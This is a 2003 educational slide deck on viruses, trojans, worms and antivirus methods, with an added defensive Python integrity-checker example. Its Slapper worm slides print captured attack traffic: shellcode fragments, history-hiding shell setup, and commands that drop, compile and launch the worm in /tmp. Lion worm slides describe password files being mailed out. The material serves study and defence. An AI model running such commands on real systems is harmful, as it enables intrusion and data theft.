Software Security
Malware: Trojans, Virii, and Worms
A Subject Overview
SECURITY INNOVATION ©2003

Topics
• General Definitions
  – Viruses
  – Trojans
  – Worms
• In-depth info
  – Viruses
  – Trojans
  – Worms
• Anti-Virus Technologies

Definitions
• Virus - code that copies itself into other programs.
• Bacteria - a program that replicates until it fills all disk space or consumes all CPU cycles.
• Payload - the harmful things the malicious program does after it has had time to spread.
• Worm - a program that replicates itself across the network (usually riding on email messages or attached documents, e.g., macro viruses).
• Trojan Horse - instructions in an otherwise good program that cause bad things to happen (e.g., sending your data or password to an attacker over the net).
• Logic Bomb - malicious code that activates on an event (e.g., a date).
• Trap Door (or Back Door) - an undocumented entry point written into code for debugging that can let in unwanted users.
• Easter Egg - extraneous code that does something "cool"; a way for programmers to show that they control the product.

Computer Viruses (and other "Malicious Programs")
• Computer "viruses" and related programs have the ability to replicate themselves onto an ever-increasing number of computers. They originally spread by people sharing floppy disks. Now they spread primarily over the Internet (as "worms").
• Other "malicious programs" may be installed by hand on a single machine. They may also be built into widely distributed commercial software packages. These are very hard to detect before the payload activates (Trojan Horses, Trap Doors, and Logic Bombs).

Viruses

What exactly is a Virus?
• A term mistakenly applied to trojans and worms
• A small program that negatively alters the way a computer works
• Self-replicating
• Done without user knowledge or intervention
  – still needs to be activated initially by the user
• There are over 60,000 viruses, trojans, and worms today!
  – Many are obsolete
  – New viruses are more and more lethal

What a Virus isn't – Common Assumptions
• Equipment failure
• Power surges/brownouts/spikes
• Magnets (that 8" subwoofer next to your case)
• Conflicting hardware drivers
• Settings or other changes made by someone else (i.e. a clueless techie)
• Something made by Microsoft

Viruses - Beginnings
• The first real virus, called "Cloner", was written by 9th grader Rich Skrenta in 1982 for the Apple II:
    It will get on all your disks
    It will infiltrate your chips
    Yes it's Cloner!
    It will stick to you like glue
    It will modify ram too
    Send in the Cloner!
• The first major PC virus was called "Brain" (1) in 1986
• Came from two brothers running a computer store in Lahore, Pakistan
  – Designed to prevent doctors from pirating their software by infecting pirated copies
  – "Infecting" only put a copyright notice in the directory of the program's floppy disks
(1) Although it was called the Brain virus, it actually contained the authors' phone numbers!
Viruses – Design Factors
• Ultimate goal is to spread as far as possible (both on the box and globally) before being wiped out
• Infection and detection are mutually limiting factors
• The functional logic of an executable file virus is as follows:
  • Search for a file to infect
    – Open the file to see if it is infected
    – If infected, search for another file
    – Else, infect the file
    – Return control to the host program

Viruses – Life Cycle
• Before it takes any action it reproduces itself
  – Virus writers balance infection with detection
• On a defined trigger, it modifies your system in some way
  – Delete files, format drives, or shut down programs
  – Eat up system resources
  – Alter data

Viruses – What's with the names?
• Names are determined by CARO
• Each unique virus is given a family name
  – Family names are derived from a quirk, the way it infects, or something else unique to the virus
• Each virus is further identified with prefixes and suffixes
  – Tells you what it does, how it infects
  – Variants of a virus are given a suffix of .A to .ZZZ
  – The naming of a virus follows the format: prefix "family name" suffix [suffix2, suffix3, …]
  – Example: W32.Bugbear@mm, one of the most lethal viruses out there
    • W32 : File infector/boot sector virus
    • Bugbear : unique family name
    • @mm : Mass Mailing distribution – uses standard techniques and email to distribute itself
• Every virus can also be uniquely identified by its signature – a binary representation of its machine code

Taxonomy of Malicious Programs
[Tree diagram: Malicious Programs – Host Program: Trapdoors, Logic Bombs, Trojan Horses, Viruses; Independent: Bacteria, Worms]

Virus Phases
• Dormant - waits for a trigger to start replicating
• Propagation - copies itself into other programs of the same type on a computer. Spreads when the user shares a file with another computer. Usually searches a file for its own signature before infecting.
  – Worms (like Melissa) spread over a network connection as executable attachments to email.
• Triggering - starts delivering the payload. Sometimes triggered on a certain date, or a certain time after infection.
• Execution - the payload function is carried out. Perhaps it puts a funny message on the screen, or wipes the hard disk clean. It may then start the first phase over again.

Types of Viruses
• Parasitic Virus - attaches itself to executable files as part of their code. Runs whenever the host program runs.
• Memory-resident Virus - lodges in main memory as part of the resident operating system.
• Boot Sector Virus - infects the boot sector of a disk, and spreads when the operating system boots up (the original DOS viruses).
• Stealth Virus - explicitly designed to hide from virus scanning programs.
• Polymorphic Virus - mutates with every new host to prevent signature detection.

Viruses – are there "Good" ones?
Possible ideas for a "good" virus are:
• An Anti-Virus Virus – finds other viruses and kills them
• File Compressor Virus – compresses the file it infects
• Encryption Virus – infects the boot sector and encrypts the disk with a user-supplied password
• Maintenance Virus – traverses a network and performs maintenance functions on individual machines

Viruses – are there "Good" ones?
"Good" viruses won't succeed for many reasons
• Technical
  – Lack of control
  – Recognition difficulty (a virus is still a virus)
  – Wasting resources
  – Containment
  – Compatibility problems
• Legal and Ethical
  – Unauthorized data modification
  – Copyright and ownership problems
  – Misuse
  – Responsibility
  – "It was just research", "You were sharing copyrighted files anyway"

Viruses – are there "Good" ones?
• Psychological
  – Trust problems
    • People like having total control of their system
  – Negative common meaning
    • It's still a virus
    • Would you buy a car that was called "Doesn't Move"? (e.g. the Chevy Nova)

Virus Characteristics
• Boot sector
  – Can't infect across networks due to protocol restrictions
• Multipartite
  – Combination of boot sector and file infector… therefore, this type can spread over networks. Very nasty.
• Stealth
  – Hides its signature through various means, such as encryption. Also by "polymorphic" means.

Viruses – Classification by Infection Targets
• System sector/Boot viruses – infect the system sectors of disks & hard drives
• File/Parasitic viruses – .COM and .EXE files, most typical
• Batch file & Macro viruses – use text batch files or Word/Excel macros
• Cluster viruses – infect the directory structures
• Companion/Spawn viruses – add an infected file to system startup
• Source code viruses – add additional code to program source code
• VB Script viruses – use the Windows Scripting Host to control the machine

Viruses – System Sector/Boot Viruses
• Share infecting the most machines with macro viruses
• Infect the master boot record (MBR) or boot sector of disks
• Useful to virus writers because this area of the disk is invisible to the user
• The area of disk is small (512 bytes), so viruses store the actual virus body somewhere else on the disk and mark that area as bad in the MBR
  – Done to avoid being detected by system scans
• Some Mac viruses infect upon the disk being inserted

Viruses – System Sector/Boot Viruses
• System sector viruses
  – Stealth component
    • Memory-resident viruses of this type can foil sector-editing programs by reporting back a saved copy of the original overwritten blocks
  – Multiple part
    • Infect both system sectors and files
    • Infected files drop the virus onto the system

Viruses – Batch File Viruses
• Are .BAT script files that contain assembly code within them
• Utilize a special handle in batch scripting that tells it to interpret the commands after it as assembly
• Can run the payload themselves, or can create a separate file and run it

Macro Viruses
• Microsoft Office applications allow "macros" to be part of the document. The macro could run whenever the document is opened, or when a certain command is selected (Save File).
  – Targets particular data files
  – Uses the application's macro interpreter
• A macro virus can delete files, generate email, edit letters, or mail itself to everyone on internal mail-address lists.

Viruses – Macro Viruses
• Regular data files did not propagate viruses
  – Viruses had to be executed manually and loaded into memory
• Programs such as the Microsoft Office suite incorporated macros with regular data files
  – Macros are run upon loading the file and infect the system
• Plain-text email with macro attachments can be automatically run upon opening or previewing the message
  – Bubbleboy (actually a worm) did this
• Melissa - the first virus to be both a Word macro virus and to use the Outlook Express address book
• Tristate – macro virus that infected Word, Excel, and PowerPoint

Viruses – File (Parasitic) Viruses
• Locate and infect .EXE .COM .OVL .DLL files
• Overwrite part of the program's code with a copy of itself
• Are not as widespread as system sector and macro viruses

Viruses – File (Parasitic) Viruses
• Simple file viruses
  – After transplanting itself into the executable, the executable often doesn't work
• Stealth component
  – Works very similarly to stealth system sector viruses
    • Masks the file size of infected files when a directory listing is done on them

File Infectors
• Must be executed to spread or deliver payload.
• Payloads may be event-driven (Logic/Time Bomb).
• Resident viruses remain in memory to infect programs as they are run.
• May spread by many means:
  – over networks,
  – from diskettes (sneaker-net),
  – from downloads.

File Infectors
[Diagram: three file layouts – an uninfected .COM file (Start … End); a prepended virus (.COM), with the virus code placed before the program; an appended virus (.COM & .EXE), where a jump at the start of the program transfers control to the virus code placed at the end. Legend: virus code; program flow.]

Viruses – Cluster Viruses
• Infect directory information in the file system rather than the file
  – When the user tries to run the program, the virus is run instead
  – To remain stealthy, the virus then locates the file and runs it
• If you boot without the virus in memory, utilities will report serious problems with the file system
  – allowing the utility to fix them will erase programs in the infected directories

Viruses – Companion/Spawn Viruses
• Legacy virus – takes advantage of the way DOS executes .COM files before .EXE files
  – Infects by making a .COM file with the same name as a .EXE
  – Relies on most users typing prog rather than prog.exe when entering a command
• This method and the cluster method are the only ways viruses can infect files without modifying them

Viruses – Source Code and VB Script Viruses
• Source code viruses seek out source code on an infected computer and add additional malicious code to it
  – Not very popular
    • Not many people program/compile code on their computer
• VB Script viruses are extremely popular because everyone running IE5 or higher can become infected
  – Allows rogue code to execute arbitrary commands on your system
  – Ex: many VB script viruses email themselves through Outlook & Outlook Express just like worms do

VBS Viruses
• ILoveYou Virus
  – E-mail attachment in "VBS".
  – Attempts to spread to default Outlook address book contacts
  – Installs a password-grabbing program, forwarding the passwords to an online chat room
  – Overwrites some files

Viruses – by Infection Methods
• Polymorphic Viruses
• Metamorphic Viruses
• Stealth Viruses
• Fast and Slow Infectors
• Sparse Infectors
• Armored Viruses
• Multipartite Viruses
• Cavity Viruses
• Tunneling Viruses
• NTFS Stream Viruses

Viruses - Polymorphic
• Polymorphic viruses change with each infection
• Polymorph/mutation engines allow virus authors to make their virus polymorphic automatically
• Simple polymorph engines insert "NOPs" into the assembly code of a virus
  – Very easy to detect
• Other simple polymorphic viruses can encrypt themselves with random keys
• More complex mutation engines insert junk code into the virus
  – Junk code must not interfere with the real executing code!
• The ideal polymorph engine, from the author's point of view, would create a truly unique virus every time

Viruses – Metamorphic
• Change the virus structure and decryption engine to evade signature matching
  – Example – the W32.Simile virus
    • Creates a copy from the decrypted virus
    • Takes out unused and extraneous code to get a "core virus"
    • Re-mutates the virus by moving and splitting functions
    • Adds extra unused/redundant code and a modified decryption engine

Viruses – Stealth
• In order to infect a system the virus must make some changes to the system
• Stealth viruses are memory-resident viruses that act as a blindfold to system processes
• Used to avoid detection and examination by the system
• Utilized by many viruses:
  – File – return the original size of an infected file when queried
  – Cluster – run the virus first, then run the user's intended program
  – System Sector/Boot – report bad blocks on the disk where the virus is located

Viruses – Fast/Slow Infectors
• Come from different methods of infection
  – Fast infector – spreads fast, doesn't care about detection
  – Slow infector – spreads randomly, avoids detection
• Fast infector – infects when a file is accessed/run
  – Takes advantage of anti-virus scans
    • Scanner opens up every file
    • Fast infector infects the recently opened file
• Slow infector – infects when a file is created/modified
  – Tries to "defeat integrity checking software by piggybacking on top of the process which legitimately changes a file"

Viruses – Sparse, Armored, and Multi Part Viruses
• Sparse infectors aim to be widespread and undetected
  – Use a variety of techniques to infect & remain undetected, such as:
    • Infect every Nth time a file is accessed
    • Every file with a specific string
    • Every time a specific keystroke occurs
• Armored viruses use special tricks to make the tracing, disassembling, and understanding of their code more difficult. (1)
  – Do this by attempting to confuse the virus scanner trying to find its exact location, among other tricks
• Multi part viruses are a combination of system sector and file infector viruses
(1) http://kb.indiana.edu/data/aehs.html

Viruses – Cavity Viruses
• Cavity viruses exploit gaps in program files and insert themselves inside, similar to a typical file virus
  – A newer Windows file format called the "Portable Executable", designed to decrease load times, has many blank gaps inside the file
• File/Parasitic viruses are similar to cavity viruses but are not as crafty
• Both types of viruses use some kind of stealth protection as well

Viruses – Tunneling Viruses
• Tunneling viruses strip hardware interrupts of any programs monitoring redirection
  – Enables viruses to go undetected and infect other programs
• This same method is used by anti-virus programs as well, to prevent being detected by viruses upon load
• Tunneling viruses can get into a "war" with the antivirus program over who will be in control of interrupts

Viruses – NTFS Alternate Data Streams
• NTFS partitions can store data in a file without increasing its reported size whatsoever
• The data is invisible to normal system tools and programs
• You can clean a file manually by copying it to another file system (one that is not formatted NTFS) and back again

Virus Detection
• 1st Generation, Scanners: search files for any of a library of known virus "signatures." Check executable files for length changes.
• 2nd Generation, Heuristic Scanners: look for more general signs than specific signatures (code segments common to many viruses). Check files for checksum or hash changes.
• 3rd Generation, Activity Traps: stay resident in memory and look for certain patterns of software behavior (e.g., scanning files).
• 4th Generation, Full Featured: combine the best of the techniques above.

Anti-Virus Technologies
• Scanners
  – Interceptors
  – Disinfectors
  – Heuristics
• Inoculators
• Integrity Checkers
• Safe Computing (aka Common Sense)
• NBAR/QoS
• EICAR test string
• Anti-Virus Packages

Anti-Virus Technologies – Scanners
• Scanners consist of a twofold method of protection
  – File scanning
  – Background checking (interceptors)
• Check for viruses by analyzing files for virus signatures
  – Works on known viruses that are unencrypted
  – Unknown viruses can be detected by monitoring activity
    • False alarms are issued
    • New technologies are improving this
  – Only as good as the last update
• Speed up scanning in various ways (part of heuristics)
  – by only scanning .EXEs for file viruses, boot sectors for boot viruses, etc.
  – algorithms to scan only sections of the file rather than the whole
• Disinfectors are also built into any reputable scanner
  – Can remove a virus from a file, but often cannot do so without damaging the file
  – If files cannot be disinfected safely, they can be quarantined
  – Still does not mean your system is safe

Anti-Virus Technologies – Scanners
• Check for viruses by using heuristics
  – 70-80% success rate
  – Unknown viruses can be detected
    • Look at characteristics of a file – determine the probability of its being infected
    • Can find and stop some new viruses from executing
  – Used to find viruses without signatures (metamorphic viruses)
    • These viruses expand/contract in size
    • Use encryption as well
  – Use a point system to detect
    • Certain actions get a certain amount of points
    • If enough points accumulate, the scanner is set off
  – Can also be applied to decide what not to scan

Anti-Virus Technologies – Inoculators
• Mark sectors and files as infected in the usual spot where viruses look
  – Doesn't work anymore today
• Make programs self-checking
  – Insert code at the beginning of the program to compare data generated (by the code) to stored data
    • Can be circumvented by stealth viruses
    • Check code/stored code can be modified
    • Sets off alarms for interceptors
    • Prevents some programs from working

Anti-Virus Technologies – Integrity Checkers
• Viruses infect/attack by making changes to the system
• Integrity checkers monitor system changes
  – Initially scan the disk and record a unique "signature" for all files and partitions
  – Can alert the user to a virus when certain changes are made
  – Allow you to see what damage has been done by a virus
  – Ideally can be used to detect unknown viruses
• Things holding integrity checkers back
  – Must be combined with a good scanner
    • Stand-alones don't work
    • Scanners that incorporate these checkers don't incorporate them effectively
      – Not checking enough changes
  – Some checkers are slow and unwieldy
• Can also be used to detect system break-ins

Anti-Virus Technologies – Common Sense!
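An added example, not from the slides, of the integrity checker described above, written in Python: it baselines size (the 1st-generation length check) and a SHA-256 digest for every file, classifies modified/grown/added/removed files on a rescan, and, because the Companion/Spawn slide notes that companion and cluster viruses infect without modifying any file, also flags same-name .COM/.EXE pairs that a hash-only checker would miss. The directory layout and file contents in demo() are constructed.

```python
import hashlib
import json
import os
import tempfile
from pathlib import Path

# DOS runs name.COM before name.EXE, which is what a companion virus abuses.
DOS_EXECUTABLE_SUFFIXES = {".com", ".exe"}


def file_signature(path: Path) -> dict:
    """Record size (the 1st-generation length check) and a SHA-256 digest
    (catches same-size overwrites that a length check would miss)."""
    digest = hashlib.sha256()
    with path.open("rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            digest.update(chunk)
    return {"size": path.stat().st_size, "sha256": digest.hexdigest()}


def scan_tree(root: Path) -> dict:
    """Baseline every regular file under root: relative path -> signature."""
    baseline = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            p = Path(dirpath) / name
            if p.is_file() and not p.is_symlink():
                baseline[p.relative_to(root).as_posix()] = file_signature(p)
    return baseline


def compare(baseline: dict, current: dict) -> dict:
    """Classify changes the way an integrity checker reports them."""
    report = {"modified": [], "grown": [], "added": [], "removed": []}
    for rel, sig in current.items():
        old = baseline.get(rel)
        if old is None:
            report["added"].append(rel)
        elif old["sha256"] != sig["sha256"]:
            report["modified"].append(rel)
            if sig["size"] > old["size"]:
                report["grown"].append(rel)   # typical of an appended file infector
    report["removed"] = list(set(baseline) - set(current))
    for changes in report.values():
        changes.sort()
    return report


def companion_pairs(paths) -> list:
    """Directories holding both name.com and name.exe.

    A companion virus never touches the .EXE, so its hash stays valid;
    the only trace is the new .COM sitting beside it."""
    seen = {}
    for rel in paths:
        p = Path(rel)
        if p.suffix.lower() in DOS_EXECUTABLE_SUFFIXES:
            key = (p.parent.as_posix(), p.stem.lower())
            seen.setdefault(key, set()).add(p.suffix.lower())
    return sorted(f"{parent}/{stem}" for (parent, stem), sfx in seen.items()
                  if sfx == DOS_EXECUTABLE_SUFFIXES)


def demo() -> tuple:
    """Constructed scenario: baseline a small tree, then simulate what an
    appended file infector and a companion virus leave behind (no malware
    involved, just bytes appended to one file and a new file created)."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp, "tree")
        (root / "bin").mkdir(parents=True)
        (root / "bin" / "edit.exe").write_bytes(b"MZ" + b"\x00" * 62)
        (root / "bin" / "notes.txt").write_bytes(b"hello")
        (root / "bin" / "old.dat").write_bytes(b"x")
        store = Path(tmp, "baseline.json")           # kept outside the tree
        store.write_text(json.dumps(scan_tree(root)))
        # Simulated changes since the baseline was taken
        with (root / "bin" / "edit.exe").open("ab") as fh:
            fh.write(b"\x90" * 16)                    # file grows, hash changes
        (root / "bin" / "edit.com").write_bytes(b"\xc3")   # companion dropped
        (root / "bin" / "old.dat").unlink()
        current = scan_tree(root)
        return compare(json.loads(store.read_text()), current), companion_pairs(current)


if __name__ == "__main__":
    print(demo())
```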
• Do not leave a floppy disk in the floppy disk drive when you shut down or restart the computer
• Write-protect your floppy disks after you have finished writing to them
• Be suspicious of email attachments from unknown sources
• Verify that attachments were actually sent by the author of the email. Newer viruses can send email messages that appear to be from people you know
• Do not set your email program to "auto-run" attachments or auto-preview messages
• Obtain all Microsoft security updates
• Back up your data frequently. Keep the (write-protected) media in a safe place, preferably in a different location than your computer
• Disable the Windows Scripting Host
• Look at extensions – megadeth_song.exe, familyvacation.com
• Watch out for double extensions – corvette.jpg.exe

Anti-Virus Technologies – NBAR/QoS
• You can use Cisco's Network Based Application Recognition (a QoS feature included in their latest routers) to get rid of Code Red
• Set up an HTTP filter by URL with a text string unique to the virus
• Attach it to its own class map
• Attach the class map to a policy map
• Set DSCP to 1 (usually not used in a configuration)
• Block Code Red attempts with an ACL

Anti-Virus Technologies – EICAR Group
• The EICAR test string is not a real virus
• Used in testing & development of anti-virus software
• Looks similar to the following:
  %^$#!FP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TESTFILE!$H+H*
• EICAR's mission statement: "EICAR combines universities, industry and media plus technical, security and legal experts from civil and military government and law enforcement as well as privacy protection organizations whose objectives are to unite efforts against writing and proliferation of malicious code like computer viruses or Trojan Horses, and, against computer crime, fraud and the misuse of computers or networks, inclusive malicious exploitation of personnel data, based on a code of conduct."
Anti-Virus Technologies – Packages
• Norton Antivirus
  – Corporate edition includes many remote administration features
• Dr. Solomon's
• McAfee
• Sophos
• Many, many others

Worms

Okay, So Then What's a Worm?
• Similar to a virus, but propagates itself through the Internet by breaking into machines
• Main goal is to bring down and deny access to networks and services
• Does not rely on user intervention
• Does not rely on being transmitted physically (i.e. by disk)
• Does not rely on being emailed or transferred by the user – does it by itself

Why Worms?
• Ease
  – write and launch once
  – many acquisitions
  – continually working
• Pervasiveness
  – weeds out the weakest targets
  – penetrates difficult networks

Worms
• A worm is a self-propagating piece of malicious software. It attacks vulnerable hosts, infects them, then uses them to attack other vulnerable hosts
• "Famous" worms
  – Morris Internet worm (1988)
  – Currently:
    • Ramen Worm
    • Lion Worm
    • Adore Worm
    • Code Red
    • Nimda

Worms
• Who writes them
  – Hackers/Crackers
  – Researchers
  – Virus writers

Worms
• Worms vs. Viruses
  – Viruses require interaction
  – Worms act on their own
  – Viruses use social attacks
  – Worms use technical attacks

Worms at a Glance
• Main goal is to disrupt the network and deny access
• Many shut down anti-virus and firewall applications
• Not concerned about detection
• 1988 – shut down 3,000-6,000 computers (5-10% of the Internet)
• Growing trend of worms making the headlines rather than true viruses
  – Code Red
  – Nimda
  – Opaserv

The Worm's Beginnings
• John Shoch invented the concept at Xerox's Palo Alto research labs in 1978
• Designed as a useful tool that borrowed clock cycles from idle CPUs
• Actually got out of control back then as well

Morris Internet Worm
On November 2, 1988, Robert Morris, Jr., a graduate student in Computer Science at Cornell, wrote an experimental, self-replicating, self-propagating 99-line program called a worm and injected it into the Internet. He chose to release it from MIT to disguise the fact that the worm came from Cornell. Morris soon discovered that the program was replicating and infecting machines at a much faster rate than he had anticipated: there was a bug. Ultimately, many machines at locations around the country either crashed or became "catatonic." When Morris realized what was happening, he contacted a friend at Harvard to discuss a solution. Eventually, they sent an anonymous message from Harvard over the network, instructing programmers how to kill the worm and prevent re-infection… The estimated cost of dealing with the worm at each installation ranged from $200 to more than $53,000.
How it Didn't Bring 6,000 Machines Down
• The worm didn't alter or destroy files
• The worm didn't save or transmit the passwords which it cracked
• The worm didn't make special attempts to gain root or superuser access in a system (and didn't utilize the privileges if it managed to get them)
• The worm didn't place copies of itself or other programs into memory to be executed at a later time (such programs are commonly referred to as timebombs)
• The worm didn't attack machines other than Sun 3 systems and VAX computers running 4 BSD Unix (or equivalent)
• The worm didn't attack machines that weren't attached to the Internet
• The worm didn't travel from machine to machine via disk
• The worm didn't cause physical damage to computer systems

How it Did Take 10% of the Net Down
• Utilized a variety of Unix security holes
  – Sendmail remote debug
    • Allowed the worm to execute remote commands on the system
  – Obtained user lists
    • Ran a dictionary attack of 432 "common" passwords against the user lists
• Most passwords today are as insecure as in 1988

How the First Worm Changed System Administration
• File access should be limited (the worm could open the encrypted password file)
• Networks should use a mix of OSes
  – i.e. a UNIX virus won't infect a Win2k server
• Brought about forums of geeks (us) for sharing research
• Beware of reflexes! Many sysadmins shut down sendmail to stop the virus, but this only delayed information on how to patch & fix it
• Logs are monotonous but extremely useful in troubleshooting

Internet Worms
• The first worms were actually designed and released in the 1980s
• Worms were non-destructive and generally were released to perform helpful network tasks
  – Vampire worm: idle during the day, at night it would use spare CPU cycles to perform complex tasks that required the extra computing power

Internet Worms
• Eventually the negative aspects of worms came to light
  – An internal Xerox worm crashed all the computers in a particular research center
  – When the machines were restarted the worm re-propagated and crashed them again

Six Components of Worms
• Reconnaissance
• Specific Attacks
• Command Interface
• Communication Mechanisms
• Intelligence Capabilities
• Unused and Non-attack Capabilities

Reconnaissance
• Target identification
• Active methods
  – scanning
• Passive methods
  – OS fingerprinting
  – traffic analysis

Specific Attacks
• Exploits
  – buffer overflows, cgi-bin, etc.
  – Trojan horse injections
• Limited in targets
• Two components – local, remote

Command Interface
• Interface to the compromised system
  – administrative shell
  – network client
• Accepts instructions
  – from a person
  – from another worm node

Communications
• Information transfer
• Protocols
• Stealth concerns

Intelligence Database
• Knowledge of other nodes
• Concrete vs. abstract
• Complete vs. incomplete

UNIX Worms
• Ramen Worm (01/2001)
• Lion Worm (02/2001)
• Adore Worm (04/2001)
• Cheese Worm (05/2001)
• Sadmind Worm (05/2001)
• Scalper Worm (07/2002)
• Slapper Worm (09/2002)

Ramen Worm
• First discovered in January 2001
• Attacks RedHat Linux 6.2 and 7.0 systems
• The worm randomly selects a class B address and attempts to use well-known exploits against rpc.statd, wu-ftpd and LPRng to gain access

Ramen Worm: Detection
• If you're running a web server, the worm replaces your index.html with its own page [image on the original slide]
• Starts an http daemon on tcp port 27374 for newly infected hosts to download code from

Ramen Worm: Added feature
• Note: the worm patches the holes it used to gain access so no other system cracker can get in. (Isn't that nice of them!)

Lion Worm
• Exploits a weakness in BIND to gain root access
• Listens on port 27374
• Sends out email to huckit@china.com with /etc/passwd, /etc/shadow and network settings
• Randomly generates class B network addresses to scan
• Scans the network for exploitable hosts

Lion Worm
• Once it exploits a host, it installs the t0rn root kit.
• Ports 60008/tcp and 33567/tcp get bound to a backdoor root shell
• A trojaned version of SSH gets bound to 33568/tcp

Adore Worm
• First appeared around April 1, 2001
• Similar to Ramen and Lion
• Exploits BIND, rpc.statd, LPRng on Redhat Linux systems
• Emails information, including /etc/passwd, to a few different email addresses

Cheese Worm
• The 'cheese worm' is a worm designed to remove all inetd services referencing '/bin/sh' from systems with root shells listening on TCP port 10008, a signature of the li0n worm. Although this can be seen as a self-spreading patch, in reality the 'cheese worm' will attempt to execute a series of shell commands on any host which accepts TCP connections on TCP port 10008.
• The 'cheese worm' perpetuates its attack cycle across multiple hosts by copying itself from attacking host to victim host and self-initiating another attack cycle. Thus, no human intervention is required to perpetuate the cycle once the worm has begun to propagate.

sadmind/IIS Worm
• The worm uses two well-known vulnerabilities to compromise systems and deface web pages.
• Sadmind/IIS propagates using a buffer overrun exploit on Solaris systems in the sadmind program, part of the Solstice AdminSuite.
• After successfully compromising the Solaris systems, it uses the "Web Server Folder Directory Traversal" vulnerability to compromise the IIS systems.
• When the worm attacks a system it will append the text "+ +" to the .rhosts file belonging to root. It will then copy the worm to the new machine and extract it into a new /dev/cuc directory. /etc/rc.d/S71rpc will be changed so the worm is started when the system is started, and then that file will be run to make the worm active immediately.

Sadmind Worm
[image on the original slide]

Scalper Worm
• This worm spreads over Apache web servers on FreeBSD by using the Chunked Encoding exploit.
• It first sends an ordinary request to the server. If it gets a reply back saying that the server is Apache, it will send the exploit regardless of whether the target server is vulnerable or not. The worm appears to give an attacker remote control abilities, including DDoS capability.
• Each worm installation keeps in memory a list of all the IPs infected from it, so that all infected servers are connected in a tree-like fashion.

Slapper Worm
• Slapper is an improved version of the Linux/FreeBSD Scalper worm.
Slapper uses the OpenSSL/mod_ssl SSLv2 handshake buffer overflow disclosed at the end of July 2002 (OpenSSL 0.9.6d and earlier).
• The Slapper worm scans for vulnerable systems on 80/tcp using an invalid HTTP GET request (no Host header) and fingerprints the Server banner in the 400 reply; the actual exploit then goes to 443/tcp. Once infected, the victim server begins scanning for additional hosts to continue the worm's propagation.
• Additionally, the Slapper worm can act as an attack platform for distributed denial of service (UDP, TCP and IPv6 floods)
• Potentially destructive (corrupts data while replicating)
• Slapper took a big evolutionary step by organizing the infected hosts into a peer-to-peer network
• Considered a hint of what future cyberweapons may look like

Slapper GET Request
(the scanning probe and the server's reply; the information Slapper wants is the Server banner, here Apache/1.3.20 with mod_ssl/2.8.4 and OpenSSL/0.9.6b)

68.168.1.15:52160 -> 127.0.0.1:80
GET / HTTP/1.1

127.0.0.1:80 -> 68.168.1.15:52160
HTTP/1.1 400 Bad Request
Date: Sun, 22 Sep 2002 03:41:10 GMT
Server: Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b DAV/1.0.2 PHP/4.0.6 mod_perl/1.24_01
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html; charset=iso-8859-1

169
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>400 Bad Request</TITLE>
</HEAD><BODY>
<H1>Bad Request</H1>
Your browser sent a request that this server could not understand.<P>
client sent HTTP/1.1 request without hostname (see RFC2616 section 14.23): <P>
<HR>
<ADDRESS>Apache/1.3.20 Server at 127.0.0.1 Port 80</ADDRESS>
</BODY></HTML>

0

The Attack
(the malformed SSLv2 client hello sent to 443/tcp: a long run of "A" padding followed by the shellcode; the "Ph//shh/bin" at the end is the push of "//sh" and "/bin" that builds the execve("/bin/sh") string)

68.168.1.15:52312 -> 127.0.0.1:443
...........N..zCyhy...i..B...y...c....t...D.1..9P`.8../9.................hjE.H.o.,B...."Oo...:.....'...i..%._~...Z...RqAJX...p3.....p5o.j.../4/.H,AAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA........AAAA....AAAAAAAAAAAA..G
@AAAA............AAAAAAAA....................................1...
.w..w..O.O.....1.....Q1..f......Y1.9.u.f..Xf9F.t.....1...1..?I..A
..1...Q[....1.Ph//shh/bin..PS.......
[..]
68.168.1.15:52312 -> 127.0.0.1:443
export TERM=xterm;export HOME=/tmp;export HISTFILE=/dev/null;
export PATH=$PATH:/bin:/sbin:/usr/bin:/usr/sbin;exec bash -i

Compiling and Installing
(the worm ships as uuencoded C source and is compiled on the victim with the victim's own gcc; HISTFILE=/dev/null above keeps the shell from logging it)

68.168.1.15:52312 -> 127.0.0.1:443
rm -rf /tmp/.unlock.uu /tmp/.unlock.c /tmp/.update.c /tmp/httpd /tmp/update /tmp/.unlock;
cat > /tmp/.unlock.uu << __eof__;
begin 655 .unlock
[worm source code, in uuencoded format, omitted]

68.168.1.15:52312 -> 127.0.0.1:443
uudecode -o /tmp/.unlock /tmp/.unlock.uu; tar xzf /tmp/.unlock -C /tmp/; gcc -o /tmp/httpd /tmp/.unlock.c -lcrypto; gcc -o /tmp/update /tmp/.update.c; /tmp/httpd 68.168.1.15; /tmp/update;

68.168.1.15:52312 -> 127.0.0.1:443
rm -rf /tmp/.unlock.uu /tmp/.unlock.c /tmp/.update.c /tmp/update; exit;

(/tmp/httpd is started with the attacking host's address as its argument, which is how the new node joins the peer-to-peer network)

/tmp/httpd Remote Communications
127.0.0.1.4156 > 68.168.1.15.4156: udp 28 (DF)
0x0000  4500 0038 0000 4000 4011 beb3 XXXX XXXX   E..8..@.@.......
0x0010  YYYY YYYY 103c 103c 0024 92cb 0000 0000   ...'.<.<.$......
0x0020  8fff 0000 25b8 aaa8 7000 0000 0000 0000   ....%...p.......
^^ obs: XXXX XXXX == localhost IP, YYYY YYYY == worm_host IP, 0x70 == incoming client flag (0x103c == port 4156 on both sides)

Worm Propagation
• Central Source Propagation
  – After a computer is infected, the attack code locates a central source (a fixed host) from which it downloads the worm code to install on the compromised computer. Once installed, it finds the next computer and the cycle starts over. An example of this kind of worm is the 1i0n worm.

Worm Propagation
• Back-Chaining Propagation
  – The Cheese worm is an example of this type of propagation, where the attacking computer initiates a file transfer to the victim computer. After initiation, the attacking computer sends its files and any payload over to the victim without intervention. The victim then becomes the attacking computer in the next cycle, with a new victim.
This method of propagation is more reliable than central source, because a central source can be cut off.

Worm Propagation
• Autonomous Propagation
  – Autonomous worms attack the victim computer and insert the attack instructions directly into the process space of the victim, so the next attack cycle starts without any additional file transfer. Code Red is an example of this type of worm. The original Morris worm of 1988 was of this nature as well.

Windows Worms
